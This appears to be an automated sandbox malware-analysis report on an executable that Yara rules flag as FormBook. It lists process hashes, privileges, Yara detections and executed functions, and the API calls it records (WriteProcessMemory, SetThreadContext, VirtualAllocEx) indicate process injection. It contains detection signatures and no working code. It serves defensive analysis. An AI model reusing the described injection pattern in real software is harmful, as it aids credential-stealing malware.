MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:24:56
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\A4mmSHCUi2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\A4mmSHCUi2.exe"
Imagebase:	0x2b0000
File size:	1'049'600 bytes
MD5 hash:	53BECF41BA02FDBC491515BA9CF6CC96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:24:56
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:24:56
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\A4mmSHCUi2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\A4mmSHCUi2.exe"
Imagebase:	0xf80000
File size:	1'049'600 bytes
MD5 hash:	53BECF41BA02FDBC491515BA9CF6CC96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:24:58
Start date:	02/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:25:20
Start date:	02/11/2024
Path:	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe"
Imagebase:	0x770000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	00:25:22
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\nslookup.exe"
Imagebase:	0x310000
File size:	77'824 bytes
MD5 hash:	9D2EB13476B126CB61B12CDD03C7DCA6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	00:25:35
Start date:	02/11/2024
Path:	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe"
Imagebase:	0x770000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:25:47
Start date:	02/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.1%
Total number of Nodes:	267
Total number of Limit Nodes:	20

Executed Functions

Function 073746E8 Relevance: 6.9, Strings: 5, Instructions: 622
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 073752BB
Hbq, xrefs: 073751A1
Hbq, xrefs: 07375403
Hbq, xrefs: 07375234
Hbq, xrefs: 07375345

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 776ff9435adebc5bf9c7e7ebe395abd5b7d8e504dc076ebb8e1307ddc30bf6a4
Instruction ID: 49aba4ca911a96563a8fd9ad2b3a0ad19c8a3449dd4d9ba3e742d4822a747230
Opcode Fuzzy Hash: 776ff9435adebc5bf9c7e7ebe395abd5b7d8e504dc076ebb8e1307ddc30bf6a4
Instruction Fuzzy Hash: DE326070A00254CFEB64DFB8C8947AEBBF6AF84300F1485AAD449AB395DE349D45CF91

Function 0762B668 Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9d6ca6b0054f79d726d357271fec659e7f0322bb098d1635947c0371ec54c7
Instruction ID: d0f523d3085dd178b9d1b1fa42358ef89069c7e9efa6219f941b43b91c36bb71
Opcode Fuzzy Hash: 6e9d6ca6b0054f79d726d357271fec659e7f0322bb098d1635947c0371ec54c7
Instruction Fuzzy Hash: E63268B4B01A158FDB59DB79C550BAE77F6EF89300F248469D10ADB3A0EB34E802DB51

Function 0737B360 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0eb543a0c7a237f3d4c69ade5cab9a5a880b8fefdc8b3eb17f98caa12f7578e
Instruction ID: 7aafe08b042f16d57f5c1ea0a54700e5b8c3cfb827ef530e0dc026498b7e7f8c
Opcode Fuzzy Hash: f0eb543a0c7a237f3d4c69ade5cab9a5a880b8fefdc8b3eb17f98caa12f7578e
Instruction Fuzzy Hash: F14282B4E11219CFEB64CF69C984B9DBBB2FF48310F1081A9E819A7355D734AA85CF50

Function 0737A090 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0cc901d86118a04b58a37ce3e22c3e82f9409396e124df992f62218fb3127b
Instruction ID: 42554ba917ebdeb4f254e63c2530df3575112e2576c16d16f491b2524c96f011
Opcode Fuzzy Hash: 5f0cc901d86118a04b58a37ce3e22c3e82f9409396e124df992f62218fb3127b
Instruction Fuzzy Hash: A032E2B0901219CFEB60CFA9C584A8EFBF2BF48315F55D195E448AB212DB34E981CF64

Function 07374BD3 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968fe4d74e162c652abbb41e8593785510ee137ed474f67d66e21772f5b06c4f
Instruction ID: 17677160426f348c7840c42ca16cef98f9e84d4a2589e69c3d1d1704707272d8
Opcode Fuzzy Hash: 968fe4d74e162c652abbb41e8593785510ee137ed474f67d66e21772f5b06c4f
Instruction Fuzzy Hash: FAC15AB1E00295CFEF24CF64C88079DBBF2AF89310F14C5AAD449AB255EB34A995CF51

Function 07629490 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c1069dbe0aee0de0283b429cc7422f5c73a0f77ef95629d44920b6a5a2c453
Instruction ID: 68ef2f3a5d4d3e787f485d343883366d0a0c61fb96630790c5b144d7cf7471cd
Opcode Fuzzy Hash: c6c1069dbe0aee0de0283b429cc7422f5c73a0f77ef95629d44920b6a5a2c453
Instruction Fuzzy Hash: 866109B1D147298BDB64CF66C8447E9BBB6BFC9300F14D1AAD40DB6250EB705A86DF40

Function 0737B350 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce80a101d82c685615f9b5631f502510a96daf1df0b9662141d26377f85b4ed
Instruction ID: aa995ad6451a23b56f62a8324674ae987778ecbb869b8dc369b0752c9177fa8b
Opcode Fuzzy Hash: 4ce80a101d82c685615f9b5631f502510a96daf1df0b9662141d26377f85b4ed
Instruction Fuzzy Hash: 7561C8B5E11218CFEB18CF6AD984B9DBBB2BF88310F14C1AAE418A7354DB359945CF50

Function 0737A06E Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 423cd9ef972258414f3f04473448f4a74f22872e056ed40d9464ae123653c920
Instruction ID: 6192db409c406ab2fc5f74dbed93d0451ee5af1c85fb5a711bee893266eb5dda
Opcode Fuzzy Hash: 423cd9ef972258414f3f04473448f4a74f22872e056ed40d9464ae123653c920
Instruction Fuzzy Hash: 5141ECB5E006598FEB58CF6AC94079EBBB2BF89300F14C0AAD45CE7255EB340A45CF51

Function 0737A050 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d2dacb3e6e90571e1da5bfa8623cc81ff7374107728423f1f31c34eb61202f
Instruction ID: 2d034b006f7034083db599c3d87eb687ca634d13ba4ded791af8d23928e9f9a2
Opcode Fuzzy Hash: 95d2dacb3e6e90571e1da5bfa8623cc81ff7374107728423f1f31c34eb61202f
Instruction Fuzzy Hash: 9241CAB5E006198FEB58CF6AC94079EBBF2BF89300F14C0AAC45CE7255EB344A458F51

Function 07620953 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bacb63730d8386bc141ba3d8ab37ef8b3311570a7d52c97d37623aac94bef2
Instruction ID: 20ce46ae18bd9ea2a0846ac640a0eb8761e4f580eb830279214b7c9879551128
Opcode Fuzzy Hash: 66bacb63730d8386bc141ba3d8ab37ef8b3311570a7d52c97d37623aac94bef2
Instruction Fuzzy Hash: 7911CCB1E05A188BEB5CCF6B9D042DEFAF7AFC9300F08D476D80DA6214DB3405469E51

Function 07627AA5 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07627CE6

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 32c034a826b0a008f4408fcf25d7a9ecae7c8bb8e2a9ba36fe71d8c153740aba
Instruction ID: 56f51ba05156e574ca3fb0a7afbec3858e8db6718a9021272804c310e6d80221
Opcode Fuzzy Hash: 32c034a826b0a008f4408fcf25d7a9ecae7c8bb8e2a9ba36fe71d8c153740aba
Instruction Fuzzy Hash: C8A17DB1D0062ACFDB50CFA8C841BEDBBB2BF44314F1485A9D909A7250DB749986DF92

Function 07627AB0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07627CE6

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4bb42c00398bf2d002bcc31319ec13450e46d9fac42454c06a8a4be62ec65939
Instruction ID: d322e1ee8c7d64ca4e5ddb5836bed9242c48dc9aa085a8161a1e91129194b407
Opcode Fuzzy Hash: 4bb42c00398bf2d002bcc31319ec13450e46d9fac42454c06a8a4be62ec65939
Instruction Fuzzy Hash: 2F917DB1D0062ACFDB50CF68C841BEDBBB2BF48314F1485A9D909A7350DB749986DF92

Function 028CAED7 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028CB13E

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 527c6ed7d061636bb3a846e135c251a848e1a8a36bec7c51b0fb651ae06a7adc
Instruction ID: 2a2da96fabca411a56a0c90be5a4c4d8f24976756c91bd22883b85ab6cf9da75
Opcode Fuzzy Hash: 527c6ed7d061636bb3a846e135c251a848e1a8a36bec7c51b0fb651ae06a7adc
Instruction Fuzzy Hash: EB8145B8A00B498FD724DF69D4457AABBF2FF88304F10892DD48AD7A40D775E849CB91

Function 028C58ED Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028C59A9

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c140ef7755a23e61db1ee5ef1e9f9328c5ba3b94d9b1620f7cd4a86f781b1ba0
Instruction ID: 120ab93def88d4ebfd0d35205d8cf5b89f1b6a264be68909fef297c8e3400219
Opcode Fuzzy Hash: c140ef7755a23e61db1ee5ef1e9f9328c5ba3b94d9b1620f7cd4a86f781b1ba0
Instruction Fuzzy Hash: 6541D1B4C00619CBDB24DFAAC9847DDBBB5BF48304F64806AD408BB255DB75A94ACF90

Function 028C44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028C59A9

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ca67b2c1e973e93c0559516e30a34d8ceff6e07e3d554ff0ccdf5dffd0c8e5eb
Instruction ID: 84c65e6def632a23c04eba98a386ea5ce2a18ae07987e5e7bf1448c0d47d9eed
Opcode Fuzzy Hash: ca67b2c1e973e93c0559516e30a34d8ceff6e07e3d554ff0ccdf5dffd0c8e5eb
Instruction Fuzzy Hash: DA41D4B4C0071DCBDB24DF9AC84479EBBB5BF48304F608069D409BB255DB75A94ACF90

Function 07375508 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 2490c54ac3037a04bda5ad4da253d71e4e0eabb33a7a36e76e97989d93604f9c
Instruction ID: 9894f5ab4ed1a1752257e45f8fdb5a6e4ede4873003edd6d8800aa03235c8987
Opcode Fuzzy Hash: 2490c54ac3037a04bda5ad4da253d71e4e0eabb33a7a36e76e97989d93604f9c
Instruction Fuzzy Hash: 073169B29003999FCB11CFA9D844ADEBFF9AF09320F14845AF954A7261C3399854DFA0

Function 07373331 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0737331D,?,?), ref: 073733CF

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 6c9095084bf220545f94791440fe2f7a46294d94777677602aec83af57f360f5
Instruction ID: d126cf7a296db479840f030798d33f02db3722b5766de6c636e9d6390de82ad1
Opcode Fuzzy Hash: 6c9095084bf220545f94791440fe2f7a46294d94777677602aec83af57f360f5
Instruction Fuzzy Hash: 5E31E4B59012499FEB10CF9AD8846DEBBF5FF48320F14842AE419A7310D775A544CFA0

Function 07371D0C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0737331D,?,?), ref: 073733CF

Memory Dump Source

Source File: 00000000.00000002.1683126270.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_A4mmSHCUi2.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b637202da7c678bcfe49ee3a15667971080018cd3466e64da3f672540228529b
Instruction ID: da730d864197c7f892d12eed3e85228467849d75ea0b29f1885470926d8d8db6
Opcode Fuzzy Hash: b637202da7c678bcfe49ee3a15667971080018cd3466e64da3f672540228529b
Instruction Fuzzy Hash: 7631E4B59012499FEB20CF9AD8846DEFBF5FB48320F14842AE819A7210D775A944CFA0

Function 07627820 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076278B8

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e3df5a000fa413ca66c01dd839eeb93d6df846d33ecc7e035393029abd91f90b
Instruction ID: 915c8626ce1d5aae843b5695881455a7015402b85c2aa5ef6a9c6baf9533e934
Opcode Fuzzy Hash: e3df5a000fa413ca66c01dd839eeb93d6df846d33ecc7e035393029abd91f90b
Instruction Fuzzy Hash: CA2133B19002599FCB10DFA9C985BDEBBF1FF48320F10842AE959A7240D7789945CBA4

Function 07627828 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076278B8

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 81689c0f16a557e591e8e6e93cd95e7dbae598f66e720c714eff935457572200
Instruction ID: e0a956c20f84a96f8ea72343c4e81aca6f3aad53f645dc2bad4d0a822dcdcc60
Opcode Fuzzy Hash: 81689c0f16a557e591e8e6e93cd95e7dbae598f66e720c714eff935457572200
Instruction Fuzzy Hash: EF2144B19003599FCB10CFAAC884BDEBBF5FF48310F10842AE919A7240D778A945CFA4

Function 07627911 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07627998

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f470117b6bc0c7dd8842597140350479bb1a0848357dab51ae6acebb5fa7ee84
Instruction ID: d17575f34f4fd2b2e3dd5e3d90e8ec13a7aa37d65eb90dbf008f76355f34bcbd
Opcode Fuzzy Hash: f470117b6bc0c7dd8842597140350479bb1a0848357dab51ae6acebb5fa7ee84
Instruction Fuzzy Hash: A12157B1C002599FCB10CFAAC885ADEFBF4FF48320F108429E559A7240C7749945CBA5

Function 028CB530 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028CD4A6,?,?,?,?,?), ref: 028CD567

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9af7f44c2117a2d9c28ae37e3cc4eaf826921000b630f1ef9d5e45758c75dffb
Instruction ID: 1a5fd8804d44d30586f0f7d91fe778a537f4cc9ce912d3463ab43a8af4fb2f43
Opcode Fuzzy Hash: 9af7f44c2117a2d9c28ae37e3cc4eaf826921000b630f1ef9d5e45758c75dffb
Instruction Fuzzy Hash: F021E5B5900248DFDB10DF9AD584ADEFBF4EB48314F14802AE914A7350D374A944CFA4

Function 07627689 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0762770E

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e1b4d14c0c9f299e14a732dcd27d3a395aa62c87410132524ca014b0d01cf66a
Instruction ID: d23d28c18072f1754f72c000f7e121b28d02210547da4efbbfc2fdf2f3309397
Opcode Fuzzy Hash: e1b4d14c0c9f299e14a732dcd27d3a395aa62c87410132524ca014b0d01cf66a
Instruction Fuzzy Hash: 1E2138B19006198FDB10DFAAC485BEEBBF5EF88324F14842AD559A7240C7789945CFA4

Function 07627690 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0762770E

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 044b859379d4e6358556931eda2e620b94da46c2f11d27fa5d7c165888b34254
Instruction ID: b2a017d82e6a63e297185e3facfdf7a39e9dbb7f38999d5106cc23bc350a053b
Opcode Fuzzy Hash: 044b859379d4e6358556931eda2e620b94da46c2f11d27fa5d7c165888b34254
Instruction Fuzzy Hash: 4F2149B19003198FDB10DFAAC485BEEBBF4EF48324F108429D559A7340C7789945CFA4

Function 07627918 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07627998

Memory Dump Source

Source File: 00000000.00000002.1684043730.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_A4mmSHCUi2.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b6179649edcf1a7746ba5e5639292d2ee49652c6d9ab92316522ab0c5caa1277
Instruction ID: a3d574669d41b964c0ffa3fc0a67259a70f0d5a7d2525cf1beb864b1f8755585
Opcode Fuzzy Hash: b6179649edcf1a7746ba5e5639292d2ee49652c6d9ab92316522ab0c5caa1277
Instruction Fuzzy Hash: 1D2134B1C003599FCB10DFAAC880AEEBBF5FF48320F10842AE559A7250C7389945CBA5

Function 028CD4D9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028CD4A6,?,?,?,?,?), ref: 028CD567

Memory Dump Source

Source File: 00000000.00000002.1669433293.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28c0000_A4mmSHCUi2.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9e14ab4c2189497f6ee905fe41a5a988be7ea5e5768c5e1fc9aaea4762e59922
Instruction ID: 53a4cc644b8bc0f9674cfb27bb1005bf2d29bf30dc40f12e7050ba70e83199fe
Opcode Fuzzy Hash: 9e14ab4c2189497f6ee905fe41a5a988be7ea5e5768c5e1fc9aaea4762e59922
Instruction Fuzzy Hash: 9F2114B9D00248DFDB10CFA9D584AEEBFF4EB08314F14805AE918A3350D374A944CFA4

Function 07627760 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076277D6

Memory Dump Source

